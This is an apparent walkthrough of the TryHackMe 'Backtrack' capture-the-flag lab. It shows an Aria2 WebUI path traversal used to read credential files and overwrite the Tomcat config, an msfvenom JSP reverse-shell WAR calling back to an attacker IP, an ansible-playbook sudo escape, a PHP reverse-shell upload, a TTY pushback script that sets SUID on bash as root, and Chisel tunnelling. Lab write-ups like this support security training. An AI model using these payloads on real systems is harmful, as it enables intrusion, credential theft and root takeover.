Introduction

Detailed walkthroughs for Backtrack CTF challenges on TryHackMe .

Enumaration

echo 10.10.233.212 backtrack.thm >> /etc/hosts

Mappped the ip to domain backtrack.thm.

Rustscan

$ rustscan -a backtrack.thm -- -sC -sV

PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 60 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDzPMYVGNn9fk2sUO4qG8t3GP/3ztCkoIRFTSFwnaHtRTiIe8s3ulwJkAyTZHSmedBOMihmyWyEmA44uxY4kUZEiba8R+c7aWHjTvD04VcKWPgVg1URPWMTHyxUcwKGnoh8n6VwM283+/4f2g2GSj2pVbacoV3xfDo8L4PshyfHK7dEd2qnQv9Yge3p5Aw/1Q7w1eaMZnaoicgzDgjhvqrRcS/DRcp3Lwoz6fGQW2/vFxW7d5aisTslKxRPslTy/Vrgprb7I+D9kdGEFqW/DXDfZLo+4O0woecE6+qSYPbIAjvIao25MTR8xHOFR0sCtyVfehEXYxvJ0fsqBG4yp/y15eDT3MSYevdvhHH1ZLejV66zILbPqUhzFBuMW1U6PKvSNPiQdzlnIRpD8ZQN7KJI8Y6zlHgoh8iu7+PgcUQNixYrX1GhMCYwNGHQlLOLriVRzhScZV3ObH1V8+g8I2sc3WZ54G2XUqZX+pN3ugjN1L5mo8mht1m7ZME+W9if37U=
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJfVuy7uiXVmzWVPtY/BYF+RZF36ZR8rh7wxeZi7yeOdWd06henZf8z5rYfalc0YHr6kE3clVa0jq+pF64w/lso=
|   256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHMk87a1jTdUzEWZNm/XtZKIto5reBlJr75kFdCKXscp
6800/tcp open  http            syn-ack ttl 60 aria2 downloader JSON-RPC
| http-methods: 
|_  Supported Methods: OPTIONS
|_http-title: Site doesn't have a title.
8080/tcp open  http            syn-ack ttl 60 Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
| http-methods: 
|_  Supported Methods: GET HEAD POST
8888/tcp open  sun-answerbook? syn-ack ttl 60
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sat, 12 Oct 2024 06:38:16 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|     <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sat, 12 Oct 2024 06:38:17 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|_    <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From the above result, the active ports and the services are:

  1. port 22 - ssh
  2. port 6800 - aria2 downloader JSON-RPC
  3. port 8080 - Apache Tomcat 8.5.93
  4. port 8888 - sun-answerbook [Aria2 WebUI]

Lets start with port 8080.

Apache server

Apache Tomcat/8.5.93

We got the home page of Apache.

$ ffuf -c -u http://backtrack.thm:8080/FUZZ -w /usr/share/wordlists/dirb/big.txt
________________________________________________
docs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 149ms]
examples                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 152ms]
favicon.ico             [Status: 200, Size: 21630, Words: 19, Lines: 22, Duration: 151ms]
manager                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 159ms]

Here manager is interesting.

backtrack.thm:8080/manager
We need username and passsword to login. Lets gather more information and revisit here.

Aria2

Lets move to port 8888.

backtrack.thm:8888
Here is the aria2 home page. aria2 is a lightweight multi-protocol & multi-source command-line download utility. aria2 can be manipulated via built-in JSON-RPC and XML-RPC interfaces.

Here port 6800 is used as aria2 downloader using JSON-RPC .

$ ffuf -c -u http://backtrack.thm:8888/FUZZ -w /usr/share/wordlists/dirb/big.txt
________________________________________________
flags                   [Status: 500, Size: 82, Words: 9, Lines: 2, Duration: 156ms]

Fuzzing gives us an interesting result flags.

backtrack.thm:8888/flags

Got an error Error: ENOENT: no such file or directory, open '/opt/aria2/docs/flags/index.html' while looking for flags page. It seems to open a page in /opt/aria2/docs/ location.

We also got the app version Aria2 Version 1.35.0 using backtrack.thm:8888/ >> Settings >> Server info.

CVE-2023-39141 [Path Transversal]

When searching about the version in internet we got some interesting results: JafarAkhondali|webui-aria2 CVE-2023-39141 , Snyk Vulnerability Database|webui-aria2 , pentest-tools|aria2-webui-path-traversal , Root Cause | CVE-2023-39141 .

$ curl --path-as-is http://backtrack.thm:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash

By using the above sources as reference we are able to perform path transversal and read the contents of file /etc/passwd. We found 2+1 users orville, wilbur and root.

Shell as tomcat

$ curl --path-as-is http://backtrack.thm:8888/../../../proc/self/environ --output -
LANG=C.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOME=/opt/tomcatLOGNAME=tomcatUSER=tomcatINVOCATION_ID=896a933ed4784ce3b76e220068b60a83JOURNAL_STREAM=9:20597

We are able to perform path transversal in the context of the user/service tomcat.

$ ffuf -c -u http://backtrack.thm:8888/../../..FUZZ -w /usr/share/SecLists-master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/etc/apache2/apache2.conf [Status: 200, Size: 7374, Words: 970, Lines: 230, Duration: 240ms]
/etc/apache2/envvars    [Status: 200, Size: 1782, Words: 190, Lines: 48, Duration: 223ms]
/etc/apache2/mods-available/dir.conf [Status: 200, Size: 157, Words: 15, Lines: 6, Duration: 234ms]
/etc/apache2/ports.conf [Status: 200, Size: 329, Words: 36, Lines: 15, Duration: 194ms]
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 749, Words: 82, Lines: 30, Duration: 194ms]
/opt/tomcat/conf/tomcat-users.xml [Status: 200, Size: 404, Words: 55, Lines: 11, Duration: 159ms]

Note: /proc/self/fd/* in wordlist LFI-gracefulsecurity-linux.txt makes the web app hang for me, so try to exclude this while fuzzing.

Here /opt/tomcat/conf/tomcat-users.xml is interesting. Lets get the data in it.

$ curl --path-as-is http://backtrack.thm:8888/../../../opt/tomcat/conf/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

  <role rolename="manager-script"/>
  <user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="manager-script"/>

</tomcat-users>

We got the users and roles configuration in tomcat server.

Got few reference in internet about the tomcat-users.xml file:Apache tomcat 8 , Apache tomcat 8 | Manager App , Apache tomcat 8 | Host Manager App , fabric8io-images |tomcat-users.xml , JavaCodeGeeks|tomcat-users.xml .

Lets create a config file with all possible privilige for user tomcat.

<?xml version="1.0" encoding="UTF-8"?>                                                                                                                       
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"      
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
                                                      
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <role rolename="admin-script"/>
  <role rolename="manager-gui"/>
  <role rolename="manager-status"/>
  <role rolename="manager-jmx"/>

  <user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx" />

</tomcat-users>

Lets overwrite the contents of /opt/tomcat/conf/tomcat-users.xml with the above data. To do this we can use aria2 service.

Aria2 [Settings >> Global Settings]
Allow-Overwrite --> true
Allow-File-Renaming --> false
dir [/opt/tomcat/conf]
Aria2 [Add >> By URIs]

Lets start the python server in our local machine and using the above by URIs option lets transfer the modified file tomcat-users.xml to the system.

After downloading the file using above method we are able to see the modified file in the location /opt/tomcat/conf/tomcat-users.xml.

Lets try to check the privileged access in the server.

Apache Tomcat Server: Deploy

We got the priviliged access on the server. Here we have an interesting option Deploy: WAR file to deploy. Lets use this to get the reverse shell.

msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$attacker_ip LPORT=1234 -f war -o shell.war

Using this msfvenom payload to get reverse shell.

After deploying the payload, execute http://backtrack.thm:8080/shell , will gives the reverse shell.

reverse shell

$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.17.62.140] from (UNKNOWN) [10.10.196.122] 47828
id
uid=1002(tomcat) gid=1002(tomcat) groups=1002(tomcat)

Got reverse shell here.

python3 -c 'import pty; pty.spawn("/bin/bash")'
^Z #(Ctrl+Z)
stty raw -echo && fg
export TERM=xterm

Got stable shell by running above commands.

tomcat@Backtrack:~$ cat /opt/tomcat/flag1.txt
THM{REDACTED}

Got the flag1 by running the above commands.

Shell as Wilbur

tomcat@Backtrack:/data$ sudo -l
Matching Defaults entries for tomcat on Backtrack:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tomcat may run the following commands on Backtrack:
    (wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml

We are abole to run /usr/bin/ansible-playbook /opt/test_playbooks/*.yml in the context of user wilbur.

Lets check all the related files.

/usr/bin/ansible-playbook –> /usr/bin/ansible –> /usr/lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py

tomcat@Backtrack:/$ ls -lah /usr/bin/ansible-playbook /usr/bin/ansible /usr/lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py
lrwxrwxrwx 1 root root   68 Mar 16  2020 /usr/bin/ansible -> ../lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py
lrwxrwxrwx 1 root root    7 Mar 16  2020 /usr/bin/ansible-playbook -> ansible
-rwxr-xr-x 1 root root 5.8K Mar 16  2020 /usr/lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py

None of the above files are editable.

Here * is used in the file /opt/test_playbooks/*.yml, means we can transverse to locate different file as well. Lets use this to get access as user wilbur.

sudo

Reference: gtfobins|ansible-playbook#sudo

echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' > /tmp/abc.yml
chmod 777 /tmp/abc.yml
export abc="../../../../tmp/abc"
sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/$abc.yml

Running the above command we got shell as wilbur.

wilbur@Backtrack:~$ cat /home/wilbur/.just_in_case.txt
in case i forget :

wilbur:mYe317Tb9qTNrWFND7KF

wilbur@Backtrack:~$ cat from_orville.txt 
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:

email : orville@backtrack.thm
password : W34r3B3773r73nP3x3l$

We have some interesting information in home directory of wilbur:

  1. Credentials of user wilbur
  2. Credentials of user orville for Image gallery web app.

Lets enumarate to get into Image gallery web app.

Shell as orville

wilbur@Backtrack:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:6800            0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN     
tcp6       0      0 :::8080                 :::*                    LISTEN     
tcp6       0      0 :::6800                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::8888                 :::*                    LISTEN     
udp        0      0 127.0.0.53:53           0.0.0.0:*                          
udp        0      0 10.10.132.57:68         0.0.0.0:*

Here we have two more ports open in localhost of the target system port 80 and port 8005. Here port 80 is more interesting, because it may be the Image gallery web app which we are looking for now.

ssh tunneling

ssh -L 1122:127.0.0.1:80 wilbur@backtrack.thm

Using ssh tunneling with the credentials of wilbur, connecting localhost:80 of target system to localhost:1122 of attacker system.

Orville's Image Gallery

Lets login to the application using the credentials we got from from_orville.txt.

Image Gallery - Dashboard
We have a upload functionality.

$ ffuf -c -u http://localhost:1122/FUZZ -w /usr/share/wordlists/dirb/big.txt -e .php
________________________________________________
.htpasswd.php           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 4208ms]
.htaccess.php           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 1204ms]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 2238ms]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 3294ms]
css                     [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 146ms]
dashboard.php           [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 226ms]
includes                [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 148ms]
index.php               [Status: 200, Size: 1264, Words: 222, Lines: 36, Duration: 151ms]
login.php               [Status: 200, Size: 1876, Words: 357, Lines: 55, Duration: 272ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 258ms]
navbar.php              [Status: 200, Size: 985, Words: 177, Lines: 26, Duration: 264ms]
register.php            [Status: 200, Size: 1288, Words: 220, Lines: 44, Duration: 163ms]
server-status           [Status: 200, Size: 15488, Words: 395, Lines: 251, Duration: 635ms]
uploads                 [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 158ms]

We got an interesting directory uploads, might be where the uploaded images stored.

We are not able to upload a file with .php extension, getting Only JPG, JPEG, PNG and GIF files are allowed. error.

Lets change the extension to .png.php. By uploading file with this extension we are not getting any error.

But exectuing file http://localhost:1122/uploads/shell.png.php actually downloaded the file, not executing it as php code.

Lets look into configuration file.

wilbur@Backtrack:~$ cat /etc/apache2/apache2.conf
...
<Directory /var/www/html/uploads>
        php_flag engine off
        AddType application/octet-stream php php3 php4 php5 phtml phps phar phpt
</Directory>
...

Here,

  1. <Directory /var/www/html/uploads> - This block applies settings specifically to the directory /var/www/html/uploads. It’s often used for directory-specific configurations.
  2. php_flag engine off - This directive disables the PHP interpreter for files in this directory. It prevents any PHP code from being executed, which is a security measure to mitigate risks associated with executing potentially malicious PHP files uploaded to this directory.
  3. AddType application/octet-stream php php3 php4 php5 phtml phps phar phpt -This typically means that files with these extensions will be treated as binary files, prompting browsers to download them rather than execute them.

Lets try directory traversal payloads in the file name.

Cyberchef - urlEncoding
Cyberchef - urlEncoding

Using pentestmonkey|php-reverse-shell payload.

By using directory traversal payloads we are successfully able to get the reverse shell as the user orville.

orville@Backtrack:/home/orville$ cat /home/orville/flag2.txt
THM{REDACTED}

We got the flag2 by executing the above command.

Shell as root

<?php
$host = 'localhost';
$dbname = 'backtrack';
$username = 'orville';
$password = '3uK32VD7YRtVHsrehoA3';

try {
    $db = new PDO("mysql:host=$host;dbname=$dbname", $username, $password);
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    echo "Connection failed: " . $e->getMessage();
    die();
}
?>

Found an interesting file in the webapp which may be useful includes/db.php. Lets move forward.

orville@Backtrack:/home/orville$ ls -lah
-rwx------ 1 orville orville  40K Oct 13 16:34 web_snapshot.zip

We found an interesting file in home directory of user orville, also noticed that this file is updated every minute. When seeing the contentents of the zip file it is converting the Image gallary files to the .zip for mat every minute.

When checking the cronjobs, ther is no active cron jobs to the user orville. Something is suspicious.

pspy64

Using pspy64 for getting running processes.

2024/10/14 13:58:01 CMD: UID=0     PID=8101   | /usr/sbin/CRON -f 
2024/10/14 13:58:01 CMD: UID=0     PID=8103   | systemctl restart manage 
2024/10/14 13:58:01 CMD: UID=0     PID=8102   | /bin/sh -c systemctl restart manage
2024/10/14 13:58:01 CMD: UID=0     PID=8104   | /usr/bin/python3 /root/manage.py
2024/10/14 13:58:02 CMD: UID=1003  PID=8208   | su - orville
2024/10/14 13:58:05 CMD: UID=1003  PID=8218   | zip -q -r /home/orville/web_snapshot.zip /var/www/html/css /var/www/html/dashboard.php /var/www/html/includes /var/www/html/index.php /var/www/html/login.php /var/www/html/logout.php /var/www/html/navbar.php /var/www/html/register.php /var/www/html/shell.png.php /var/www/html/uploads

We notice something interesting: the root user switches to the orville user, and runs the zip command.

TTY Pushback

The issue here is that while running the su command, the root user does not use the -P flag, meaning no new PTY is allocated.

This situation is vulnerable to TTY Pushback. Essentially, we can stop the shell running as the orville user by sending a SIGSTOP signal to it, allowing focus to shift to the root shell. After that, we can use the TIOCSTI operation with the ioctl to send inputs to the root shell. You can read more about the vulnerability here.TTYPushback

#!/usr/bin/env python3
import fcntl
import termios
import os
import sys
import signal

os.kill(os.getppid(), signal.SIGSTOP)

for char in sys.argv[1] + '\n':
    fcntl.ioctl(0, termios.TIOCSTI, char)

Lets save this as ttyPush.py

orville@Backtrack:/home/orville$ echo "python3 /home/orville/ttyPush.py 'chmod +s /usr/bin/bash'" >> .bashrc

Append the execution of the script to .bashrc by executing the above command. After successful execution of above script by root we got the SUID bit of /bin/bash

Refer: GTFObins|bash|SUID

orville@Backtrack:/home/orville$ bash -p
bash-5.0# id
uid=1003(orville) gid=1003(orville) euid=0(root) egid=0(root) groups=0(root),1003(orville)

Executing the above command, we got the root privilege.

bash-5.0# cat /root/flag3.txt 

██████╗░░█████╗░░█████╗░██╗░░██╗████████╗██████╗░░█████╗░░█████╗░██╗░░██╗
██╔══██╗██╔══██╗██╔══██╗██║░██╔╝╚══██╔══╝██╔══██╗██╔══██╗██╔══██╗██║░██╔╝
██████╦╝███████║██║░░╚═╝█████═╝░░░░██║░░░██████╔╝███████║██║░░╚═╝█████═╝░
██╔══██╗██╔══██║██║░░██╗██╔═██╗░░░░██║░░░██╔══██╗██╔══██║██║░░██╗██╔═██╗░
██████╦╝██║░░██║╚█████╔╝██║░╚██╗░░░██║░░░██║░░██║██║░░██║╚█████╔╝██║░╚██╗
╚═════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝

THM{REDACTED}

By executing the above command, we got flag3.

Alternatives

Chisel tunneling

wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz
gzip -d chisel_1.10.0_linux_amd64.gz
mv chisel_1.10.0_linux_amd64 chisel
chmod +x chisel
python -m http.server 80 &
./chisel server --reverse --port 8000

This command starts a Chisel server in reverse mode on port 8000 in attacker machine.

# in target machine
cd /tmp
wget http://10.17.62.140/chisel
chmod +x chisel
./chisel client 10.17.62.140:8000 R:1122:127.0.0.1:80 &

The above process is used to get port forded using chisel.

We solved the lab.

Happy Hacking !!! 😎